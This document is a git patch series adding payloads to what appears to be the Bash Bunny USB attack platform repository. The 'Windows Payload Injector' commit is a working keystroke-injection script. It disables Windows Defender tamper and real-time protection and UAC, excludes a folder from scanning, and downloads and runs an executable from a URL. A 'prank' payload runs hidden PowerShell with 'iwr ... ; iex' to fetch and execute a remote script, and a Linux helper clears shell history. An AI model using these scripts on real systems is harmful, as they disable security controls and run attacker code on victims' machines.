From 858bb2df2c4b03dde8b2a244138af6cc607d2fad Mon Sep 17 00:00:00 2001 From: drapl0n <87269662+drapl0n@users.noreply.github.com> Date: Sat, 17 Dec 2022 00:22:57 +0530 Subject: [PATCH 1/4] uploading LINUX_MOUNT extension (#570) * uploading LINUX_MOUNT extension * uploading LINUX_MOUNT_DEMO * decreasing delay time * removed delays --- payloads/extensions/linux_mount.sh | 30 +++++++++++++++++++ .../general/LINUX_MOUNT_DEMO/payload.txt | 27 +++++++++++++++++ 2 files changed, 57 insertions(+) create mode 100644 payloads/extensions/linux_mount.sh create mode 100644 payloads/library/general/LINUX_MOUNT_DEMO/payload.txt diff --git a/payloads/extensions/linux_mount.sh b/payloads/extensions/linux_mount.sh new file mode 100644 index 00000000..46b06c3f --- /dev/null +++ b/payloads/extensions/linux_mount.sh @@ -0,0 +1,30 @@ +#!/bin/bash +# +# LINUX_MOUNT v1 by @drapl0n +# Auto mounts BashBunny on GNU/Linux systems. +# NOTE: Mount path is stored in variable "lmnt". +# Usage: LINUX_MOUNT - to automatically mount BashBunny. +# LINUX_UMOUNT - to unmount mounted BashBunny. + +function LINUX_MOUNT() { + Q CTRL-ALT t + Q DELAY 1000 + Q STRING unset HISTFILE + Q ENTER + Q DELAY 200 + Q STRING disk='$(lsblk -fs | grep BashBunny | awk '\'{print\ '$1'}\'\)'' + Q ENTER + Q DELAY 200 + Q STRING udisksctl mount -b /dev/'$disk' + Q ENTER + Q DELAY 2000 + Q STRING lmnt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)'' + Q ENTER + Q DELAY 500 +} +function LINUX_UMOUNT() { + Q STRING udisksctl unmount -b /dev/'$disk' + Q ENTER + Q DELAY 1000 +} +export -f LINUX_MOUNT LINUX_UMOUNT diff --git a/payloads/library/general/LINUX_MOUNT_DEMO/payload.txt b/payloads/library/general/LINUX_MOUNT_DEMO/payload.txt new file mode 100644 index 00000000..b2f7fcff --- /dev/null +++ b/payloads/library/general/LINUX_MOUNT_DEMO/payload.txt @@ -0,0 +1,27 @@ +# Title: LINUX_MOUNT_DEMO +# Description: LINUX_MOUNT is an extension to automatically mount/unmount BashBunny on GNU/Linux systems. +# AUTHOR: drapl0n +# Version: 1.0 +# Category: Genral +# Target: Unix-like operating systems. +# Attackmodes: HID, Storage + +ATTACKMODE STORAGE HID +LED SETUP + +# LINUX_MOUNT automatically mounts BashBunny. +LINUX_MOUNT + +# NOTE: Mount path is stored in varialble "lmnt". +Q STRING echo Successfully mounted BashBunny at '\"$lmnt\"'. +Q ENTER + +# LINUX_UMOUNT unmounts mounted BashBunny from system. +LINUX_UMOUNT + +Q STRING echo Successfully unmounted BashBunny. +Q ENTER +LED FINISH +Q DELAY 2000 +Q STRING exit +Q ENTER From d68298eaa3d1d06005324266206e2867902ba144 Mon Sep 17 00:00:00 2001 From: rsxchin <68041324+rsxchin@users.noreply.github.com> Date: Fri, 16 Dec 2022 08:58:09 -1000 Subject: [PATCH 2/4] Add GET BB_LABEL function and docs (#569) * Add GET BUNNY_LABEL to get.sh Instead of hardcoding "BashBunny" or whatever new name the Bunny has, attackers can use a GET command. * Add docs for GET HOST_IP & GET BB_LABEL --- docs/readme.txt | 6 +++++- payloads/extensions/get.sh | 4 ++++ 2 files changed, 9 insertions(+), 1 deletion(-) diff --git a/docs/readme.txt b/docs/readme.txt index ed0b9437..04f8598f 100644 --- a/docs/readme.txt +++ b/docs/readme.txt @@ -6,7 +6,7 @@ Bash Bunny by Hak5 USB Attack/Automation Platform - -+- QUICK REFERENCE GUIDE v1.4 -+- + -+- QUICK REFERENCE GUIDE v1.5 -+- +-----------------+ @@ -107,6 +107,8 @@ $HOST_IP IP Address of the Bash Bunny (Default: 172.16.64.1) $SWITCH_POSITION "switch1", "switch2" or "switch3" + $BB_LABEL Volume name of the BashBunny + when mounted. @@ -153,6 +155,8 @@ GET TARGET_HOSTNAME Returns $TARGET_HOSTNAME GET HOST_IP Returns $HOST_IP GET SWITCH_POSITION Returns $SWITCH_POSITION + GET TARGET_OS Returns $TARGET_OS + GET BB_LABEL Returns $BB_LABEL diff --git a/payloads/extensions/get.sh b/payloads/extensions/get.sh index 0ebd6e7d..791ad2c0 100755 --- a/payloads/extensions/get.sh +++ b/payloads/extensions/get.sh @@ -26,6 +26,10 @@ function GET() { [[ "${ScanForOS,,}" == *"linux"* ]] && export TARGET_OS='LINUX' && return export TARGET_OS='UNKNOWN' ;; + "BB_LABEL") + export BB_LABEL=$(ls -l /dev/disk/by-label/ | awk '/nandf$/ { print $9 }') + ;; + esac } From d237d080e63c2897e6e45def49ea04f8cbf0bb69 Mon Sep 17 00:00:00 2001 From: KryptoKola <119087357+KryptoKola@users.noreply.github.com> Date: Fri, 16 Dec 2022 13:59:18 -0500 Subject: [PATCH 3/4] payload.txt (#567) What the payload does: # 1) Disables Tamper Protection in Windows Defender. # 2) Disables UAC / Turns UAC off # 3) Creates Payload Directory in C:/ Drive # 4) Disables Real-Time Protection in Windows Defender. # 5) Adds the Payload Directory as an exclusion in Windows Defender # 6) Downloads Payload from Specified URI (Enter in Variable Below) # 7) Runs Payload on System --- .../Windows-Payload-Injector/payload.txt | 85 +++++++++++++++++++ 1 file changed, 85 insertions(+) create mode 100644 payloads/library/remote_access/Windows-Payload-Injector/payload.txt diff --git a/payloads/library/remote_access/Windows-Payload-Injector/payload.txt b/payloads/library/remote_access/Windows-Payload-Injector/payload.txt new file mode 100644 index 00000000..eb7a55e5 --- /dev/null +++ b/payloads/library/remote_access/Windows-Payload-Injector/payload.txt @@ -0,0 +1,85 @@ +#!/bin/bash +# +# Title: Microsoft Windows Payload Injector +# +# Description: +# 1) Disables Tamper Protection in Windows Defender. +# 2) Disables UAC / Turns UAC off +# 3) Creates Payload Directory in C:/ Drive +# 4) Disables Real-Time Protection in Windows Defender. +# 5) Adds the Payload Directory as an exclusion in Windows Defender +# 6) Downloads Payload from Specified URI (Enter in Variable Below) +# 7) Runs Payload on System +# +# Author: KryptoKola +# Version: 1.0 +# Category: Remote Access +# Target: Microsoft Windows 10 & 11 + +LED SETUP +ATTACKMODE HID +#Variables +readonly PAYLOAD_DOWNLOAD_URI="ENTER PAYLOAD URI HERE" + +#Disables Tamper Protection in Windows 10 & 11 +LED STAGE1 +Q GUI s +Q STRING "Virus & threat protection" +Q ENTER +Q DELAY 10000 +Q TAB +Q TAB +Q TAB +Q TAB +Q ENTER +Q DELAY 1000 +Q TAB +Q TAB +Q TAB +Q TAB +Q SPACE +Q DELAY 1000 +Q ALT y +Q DELAY 1000 +Q ALT F4 +Q FN ALT F4 + +#Starts Powershell in Admin mode +LED STAGE2 +Q GUI r +Q DELAY 250 +Q STRING powershell Start-Process powershell -Verb runAs +Q ENTER +Q DELAY 3000 +Q ALT y +Q DELAY 5000 + +#Disables UAC, Creates Payload Directory, and moves to C:/ directory in powershell +LED STAGE3 +Q STRING "cd C:/;mkdir Payloads;Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0;" +Q ENTER +Q DELAY 1500 +Q ALT y +Q DELAY 250 + +#Disables Real Time Protection, Makes an exclusion to the Payloads folder in Windows Defender, Navigates to the Payloads folder, then Downloads specified payload from URI. +LED STAGE4 +Q STRING "Set-MpPreference -DisableRealtimeMonitoring 1;Set-MpPreference -ExclusionPath "C:/Payloads";cd C:/Payloads;Start-BitsTransfer -Source ${PAYLOAD_DOWNLOAD_URI} -Destination ./payload.exe;" +Q ENTER +Q DELAY 2000 + +#Launches the Payload on the machine +LED STAGE5 +Q STRING ./payload.exe +Q ENTER +Q DELAY 250 + +#Clears the shell and exits out. +LED CLEANUP +Q STRING clear +Q ENTER +Q DELAY 250 +Q STRING exit +Q ENTER + +LED FINISH From 2266a9ddf65599c790a9025651941bcd9995b4ee Mon Sep 17 00:00:00 2001 From: atomic <75549184+atomiczsec@users.noreply.github.com> Date: Fri, 16 Dec 2022 14:01:05 -0500 Subject: [PATCH 4/4] New Payload - cApS-Troll (#566) * Add files via upload * Add files via upload * Add files via upload * Update payload.txt --- payloads/library/prank/cApS-Troll/README.md | 105 ++++++++++++++++++ payloads/library/prank/cApS-Troll/a.ps1 | 17 +++ payloads/library/prank/cApS-Troll/payload.txt | 18 +++ 3 files changed, 140 insertions(+) create mode 100644 payloads/library/prank/cApS-Troll/README.md create mode 100644 payloads/library/prank/cApS-Troll/a.ps1 create mode 100644 payloads/library/prank/cApS-Troll/payload.txt diff --git a/payloads/library/prank/cApS-Troll/README.md b/payloads/library/prank/cApS-Troll/README.md new file mode 100644 index 00000000..d7011865 --- /dev/null +++ b/payloads/library/prank/cApS-Troll/README.md @@ -0,0 +1,105 @@ +

+ + + +

+ + +
+ Table of Contents +
    +
  1. Description
    2. +
  2. Getting Started
    3. +
  3. Contributing
    4. +
  4. Version History
    5. +
  5. Contact
    6. +
  6. Acknowledgments
    7. +
+
+ +# cApS-Troll + +This payload is meant to prank your victim with TURNING on AND off CAPS LOCK + +## Description + +This payload is meant to prank your victim with TURNING on AND off CAPS LOCK + +## Getting Started + +### Dependencies + +* Dropbox or other file sharing service +* Windows 10,11 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Device will download the file and place them in proper directories to then run the script +``` +powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here: + +[atomiczsec](https://github.com/atomiczsec) & +[I-Am-Jakoby](https://github.com/I-Am-Jakoby) + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

📱 My Socials 📱

+
+ + + + + + +
+ + C# + +
YouTube + 		+ + Python + +
Twitter + 		+ + Jsonnet + +
I-Am-Jakoby's Discord +
+
+ +

(back to top)

+ + + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [I-Am-Jakoby](https://github.com/I-Am-Jakoby) + +

(back to top)

diff --git a/payloads/library/prank/cApS-Troll/a.ps1 b/payloads/library/prank/cApS-Troll/a.ps1 new file mode 100644 index 00000000..fa7129c1 --- /dev/null +++ b/payloads/library/prank/cApS-Troll/a.ps1 @@ -0,0 +1,17 @@ +while (1){ +Start-Sleep -Second 45 +$wsh = New-Object -ComObject WScript.Shell +$wsh.SendKeys('{CAPSLOCK}') +Start-Sleep -Second 15 +$wsh = New-Object -ComObject WScript.Shell +$wsh.SendKeys('{CAPSLOCK}') +Start-Sleep -Second 15 +$wsh = New-Object -ComObject WScript.Shell +$wsh.SendKeys('{CAPSLOCK}') +Start-Sleep -Second 15 +$wsh = New-Object -ComObject WScript.Shell +$wsh.SendKeys('{CAPSLOCK}') +Start-Sleep -Second 15 +$wsh = New-Object -ComObject WScript.Shell +$wsh.SendKeys('{CAPSLOCK}') +} \ No newline at end of file diff --git a/payloads/library/prank/cApS-Troll/payload.txt b/payloads/library/prank/cApS-Troll/payload.txt new file mode 100644 index 00000000..9dc8ab8f --- /dev/null +++ b/payloads/library/prank/cApS-Troll/payload.txt @@ -0,0 +1,18 @@ +REM Title: cApS-Troll + +REM Author: atomiczsec + +REM Description: This payload is meant to prank your victim with TURNING on AND off CAPS LOCK + +REM Target: Windows 10 + +"URL='http://example.com/powershell.ps1?dl=1'" + +QUACK DELAY 2000 +QUACK GUI r +QUACK DELAY 500 +QUACK STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr $URL ; iex $pl +QUACK ENTER + +REM Remember to replace the link with your DropBox shared link for the intended file to download in the URL variable +REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly